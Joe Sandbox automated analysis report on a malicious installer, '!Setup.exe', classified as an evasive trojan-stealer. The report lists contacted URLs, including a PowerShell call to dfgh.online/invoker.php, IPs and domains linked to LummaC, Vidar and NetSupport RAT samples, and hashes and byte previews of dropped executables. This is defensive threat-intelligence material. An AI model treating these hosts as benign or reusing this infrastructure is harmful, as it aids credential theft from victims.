https://sectigo.com/CPS0D	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://dfgh.online	powershell.exe, 00000010.00000002.2646877718.0000000004D31000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://jrsoftware.org0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://jrsoftware.org/	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://dfgh.online/invoker.php?compname=	powershell.exe, 00000010.00000002.2646333940.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000010.00000002.2646877718.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.certum.pl/CPS0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://repository.certum.pl/ctnca.cer09	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.certum.pl/ctnca.crl0k	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000010.00000002.2646877718.0000000004FCF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lBcq	powershell.exe, 00000010.00000002.2646877718.0000000004A31000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.faststone.org/FSCTutorial.htm	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.faststone.org/order.htmU	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://www.autoitscript.com/autoit3/X	Publisher.com, 0000000C.00000000.2073055433.0000000000795000.00000002.00000001.01000000.00000007.sdmp, Amend.9.dr, Publisher.com.2.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	!Setup.exe	false		high
https://www.certum.pl/CPS0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://www.faststone.org/	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/cscasha2.crl0q	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cscasha2.ocsp-certum.com04	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://www.faststone.org/U	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://www.faststone.org/order.htm	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.37.128	klipvumisui.shop	United States	13335	CLOUDFLARENETUS	false
185.161.251.21	cegu.shop	United Kingdom	5089	NTLGB	false
104.21.89.250	laborersquei.click	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581467
Start date and time:	2024-12-27 20:23:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	!Setup.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@81/35@5/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 38 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: !Setup.exe

Simulations

Behavior and APIs

Time	Type	Description
14:24:00	API Interceptor	1x Sleep call for process: !Setup.exe modified
14:24:03	API Interceptor	12x Sleep call for process: Publisher.com modified
14:24:59	API Interceptor	8x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.37.128	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
185.161.251.21	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse
104.21.89.250	6CJfScEKhr.exe	Get hash	malicious	Azorult gzRat	Browse	etapackbg.com/css/Sngggz.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cegu.shop	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
laborersquei.click	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	172.67.166.49
laborersquei.click	SET_UP.exe	Get hash	malicious	LummaC	Browse	104.21.89.250
klipvumisui.shop	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.41
	http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u	Get hash	malicious	HTMLPhisher	Browse	104.21.18.132
	http://resources.onestart.ai/onestart_installer_130.0.6723.134.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	172.67.12.83
	https://franoapas.co.in/	Get hash	malicious	Unknown	Browse	172.67.221.200
	http://bitstampweb.hbrygl.com	Get hash	malicious	Unknown	Browse	172.67.136.84
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	TrdIE26br9.msi	Get hash	malicious	Unknown	Browse	172.67.148.171
	0x001f00000004676d-1858.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
NTLGB	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse	185.161.251.21
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	81.97.105.115
	installer_1.05_36.4.zip	Get hash	malicious	NetSupport RAT, LummaC, LummaC Stealer	Browse	185.161.251.21
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	163.165.65.186
	xd.ppc.elf	Get hash	malicious	Mirai	Browse	92.237.44.174
	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	80.4.135.78
	armv4l.elf	Get hash	malicious	Mirai	Browse	62.254.229.173
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	82.3.236.97
	loligang.x86.elf	Get hash	malicious	Mirai	Browse	213.107.138.142
CLOUDFLARENETUS	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.204.41
	http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u	Get hash	malicious	HTMLPhisher	Browse	104.21.18.132
	http://resources.onestart.ai/onestart_installer_130.0.6723.134.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	Electrum-bch-4.4.2-x86_64.AppImage.elf	Get hash	malicious	Unknown	Browse	172.67.12.83
	https://franoapas.co.in/	Get hash	malicious	Unknown	Browse	172.67.221.200
	http://bitstampweb.hbrygl.com	Get hash	malicious	Unknown	Browse	172.67.136.84
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.165.185
	TrdIE26br9.msi	Get hash	malicious	Unknown	Browse	172.67.148.171
	0x001f00000004676d-1858.exe	Get hash	malicious	LummaC	Browse	104.21.11.101
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.11.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	0x001f00000004676d-1858.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	o0cabS0OQn.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	mDuCbT8LnH.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	Vq50tK1Nx2.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21
	O53VxanH6A.exe	Get hash	malicious	LummaC	Browse	104.21.37.128 104.21.89.250 185.161.251.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\243714\Publisher.com	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse
	appFile.exe	Get hash	malicious	LummaC Stealer	Browse
	FloydMounts.exe	Get hash	malicious	LummaC Stealer	Browse
	installer.bat	Get hash	malicious	Vidar	Browse
	skript.bat	Get hash	malicious	Vidar	Browse
	din.exe	Get hash	malicious	Vidar	Browse
	yoda.exe	Get hash	malicious	Vidar	Browse
	lem.exe	Get hash	malicious	Vidar	Browse
	script.ps1	Get hash	malicious	Vidar	Browse
C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Full_Setup.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllul9kLZ:NllUG
MD5:	087D847469EB88D02E57100D76A2E8E4
SHA1:	A2B15CEC90C75870FDAE3FEFD9878DD172319474
SHA-256:	81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
SHA-512:	4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
Malicious:	false
Preview:	@...e.................................,..............@..........

C:\Users\user\AppData\Local\Temp\243714\L

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	455968
Entropy (8bit):	7.99963537115097
Encrypted:	true
SSDEEP:	12288:az909JZ1vVXbafxHMe7OBkhld2qMwPoT0pofv2x:apc/XmJnSBkd2BYKXW
MD5:	139DBD31E713F42CCEA2D2680D9FD119
SHA1:	0D103A62A67F2FBBF8A1D1BFC9228D8BD5CC8663
SHA-256:	A6531611D97053447652DA523E45476F3CE928A6B4FA4BAC33D976E644142776
SHA-512:	71A02E36105A35C7FB6D8A839C00CB23FE7BAE45FCCEF514445CF0E4E94860B7107C742105C68D029B24C801EC342B767B31B90D20FDB12174F383A973B910A4
Malicious:	false
Preview:	.O.la^.T..~...q...mNY..N8\..q.u....I./...S...:.*W....!.xm.(.B.<..z.eas.p.M.H.\|..i.X.......[x...W]4...U.J../.+=.).4Xp...Xi(U.G.%..........g...d.O...Z..L\|......8\|.....0....b.\....z.>E.8V....@...P......6[.. ].?xknH>E.<kl.......>...V....."x6......A..h?S.GPdV..C../...`5[...6].Yi..0.3#...Z....gr..\...)..(NL.%\.........6.~....C...y.Q....XN.4C.....J....Jh......dD......e./.,.}.J.2....(.D..........\..2K..:.H...i..T%..l.0...s0 2~.@.H.....P...3..R.+{....[....1.b.l.Nb ....O...}. !.....+..z.2.RF_.F].v1...oE..9...vm_..".3Un]/.^J%7.......c.t`Zq:.B..J~....w......g.+R ....ke4..."?..X.....N<<X..x.r...".e.."H.+}.kO../..v/aOW.....>...n.%...C.....(.lB..'..].s..Q.jW.S..f..83i......lF;.z.....bHet.)z\}.'......Y...../E3.c.........#_\|.f..H.....s.Lm...4(.Wg#..&.{..q7~:~......L...._e......f..o_...$...3...7\|;.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y

C:\Users\user\AppData\Local\Temp\243714\Publisher.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: JA7cOAGHym.exe, Detection: malicious, Browse Filename: appFile.exe, Detection: malicious, Browse Filename: FloydMounts.exe, Detection: malicious, Browse Filename: installer.bat, Detection: malicious, Browse Filename: skript.bat, Detection: malicious, Browse Filename: din.exe, Detection: malicious, Browse Filename: yoda.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: script.ps1, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\243714\Publisher.com
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12191445
Entropy (8bit):	7.975937528091654
Encrypted:	false
SSDEEP:	196608:3x6Xhm3naEJp1N1x7JpGTRQTrwlZJdO6T+nAIy986TeaZcSSFDi/:3x6Xw3RJbdVpGmT8ldkn+8sZcSj
MD5:	34B63F16F994365A2FC9263E87CD28E8
SHA1:	3C64CAD2F1D93BF4D67EAAD58E3C80390F760589
SHA-256:	36E2B9BAA6A42E568DA06872089A66ACFB533B14DCF52568D061F51A606BD59F
SHA-512:	E48DE084739ADF52CA8DE549AB0D19F462DC017C80CE1EFD72A1994D924218CD99B87D641832B171F50CAB3DDA5508FFF017F0E2FBD78E7D62E3CD70C16FC54F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Joe Sandbox View:	Filename: Full_Setup.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@...................................Y...@......@...................p..q....P.......................... Z...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

C:\Users\user\AppData\Local\Temp\Abilities

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	7.997360025489062
Encrypted:	true
SSDEEP:	1536:PJbJEIfWwDdhlKZu6BCrXje/CSCOe83Mr/hZ8cfMi5gr7aIIt:hbe2dhIc62jeahK8mLiW3Jm
MD5:	B24CB4EA3601650D3EA3172D1896B893
SHA1:	0C900B06FDA665DCA45962C62A3B2AEA837A7B61
SHA-256:	658FDE2EBD48E704BFC050B1C247FBDFDE3C3E0F1F4E1CFD8FE1AE12384D857A
SHA-512:	FB5E1C56BA4EA33D0F5CB3E2720FD3ABD2B1B2A3EDD015184E6F4A8B03FF4843D25B830D1CB032A990D9AAA13B3BAA1733754C0D9D546F438FE795D0F81EF00E
Malicious:	false
Preview:	&.....Z.Y...Y.....K..k....M..A5..i.!.}..;sfd...mf.....o...yb..P.i..........z.....fw.ZW..N.......8.)...H.Q......S......B!............F.i..d...h..)...<.....8.....HX.U.....`...t.Uo...A.1!....u.....o..6.+zL:....4.0c...K..T.".....'.C..9.5E..Ef>{t.....Z.@:!...>....G..5\o...J.X.. .....z&tZ...(....0.....E.....0..$8w......S..C.k/.A)qN..a.6$c.\|.KiI.R.t..\q.o:...Z<..V..W`.........<G..3(..Iu.i.O.R%BAb.......".WYj.y..g\|......O..U0.P...d.....2....j.cS:2....5*e...T.29.x..b.3.E..@,P.c..&.%0.O<...B...l.k.L.l.G.i..\R..-F........<Z....../...V..........'].\.......$...Q..NHH.i3.-..jI...zW....).........\|....e.......rq..XW.-.B.cg...q4.g..@.J0.".J.W#=........78.{~...U.h.....Q..-.RG)..p...V............I..&$...(.2..`..ag..#2D.......$7......3.n.B[...md.......,X..x6M..7........^;d..k_B....u..<.z....R.?...1V...f...vo.....X...U.S...........}...Xm.n@R>S..].."..GA.........Mu..!:I...Z..Dmv..r...1.G.@m..N..\|!...6I.RT..(o.n...^0.@..,..'!....Ug.W..D$....(..,..U.....)P./

C:\Users\user\AppData\Local\Temp\Amend

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.0428783722302155
Encrypted:	false
SSDEEP:	1536:H5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOW:H5elDWy4ZNoGmROL7F1G7ho2kOW
MD5:	0E482DF16CAC5927494A33B8757E5DAE
SHA1:	00F9A74C557D8B035A9E31A63369CE2A3179C1D8
SHA-256:	4D3F53E4EEC30A9DB27307763FC420B77D7832BFE73E99007F1EB1F8A5F8A319
SHA-512:	A009B8E2097CC18A62E4AEC36C132F8F0293EF03074B44A168A399AE8BB4FF7806E415D79E4EC4E43ECD9AA7CD963E738E022CFE6B34B5A3360D7CDB1BC214B7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Applied

Download File

Process:	C:\Users\user\Desktop\!Setup.exe
File Type:	Microsoft Cabinet archive data, 488036 bytes, 11 files, at 0x2c +A "Amend" +A "Somehow", ID 9101, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488036
Entropy (8bit):	7.998496527452013
Encrypted:	true
SSDEEP:	12288:zTdBQIpDo9tWqeSKXeJgTwLuB1y+5INYtm2rb+qS:HWr7KuJgTwLw5tNM
MD5:	2F1F3164FC9E3BA1D0D5663E41697DE4
SHA1:	15DEA9CF2090AC65CC02537AE3297C9C5669A99A
SHA-256:	BE027959F540E77FEF3FFFDA90CBA42AAE44AC06F4A21671ED879B3943FEDA38
SHA-512:	E3DD3D0883A7BA6692FB89A2316C32F25754B991CAD73D0A43DCC7B70A998117886237A0E68A8A5A22473C048D67B5DFBAA7B9DEE12127C1951987B394E7B22F
Malicious:	false
Preview:	MSCF....dr......,................#..?..................Y.` .Amend............Y.` .Somehow..0.........Y.` .Sensitive..$.........Y.` .Identifier............Y.` .Approved............Y.` .Msg..(.........Y.` .Automatically............Y.` .Documentary............Y.` .Substances.....`......Y.` .Gain.....`......Y.` .Breaking.g.. ....CK.<k.S.+. .....-........LR.>....Hp.{[1.d...'..Z..[..m...jK...b....D....'(........]k...'.L(~....Y.%;g..^{...c'.>....>....>....>....>....>....>....>....>....>....>....>....>.sa..z../...x..n9kz[6.(....V.k.6.6._........c<..7.bQ1.lQW....S..x}+z...n......]~....r\|..W......X...\|...za).....8.............eT.e....p,c.#.r......Z.2:._a.C'..Uv .yq..1^.H.F.y..s..cE.'....9G%......@.rq..i...Ve..l.:Zg..a.:y!+......n.ex.K....gl...k....:..x....x.:Z[...1....Z..c]..G...}e.t!6Y`..8t..cl........\|..........(l.`.....4.=b;.\|Y....,.[..t..[..% ........n.......l.&.a;.....m=.+.=...m.v...u.p..ow....s...Z.7....N......^V#.]....k.....X..w.......$..

C:\Users\user\AppData\Local\Temp\Approved

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	6.549376591082562
Encrypted:	false
SSDEEP:	1536:P1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYM:PZg5PXPeiR6MKkj9
MD5:	A9A63986AD128966E3309A99116466E8
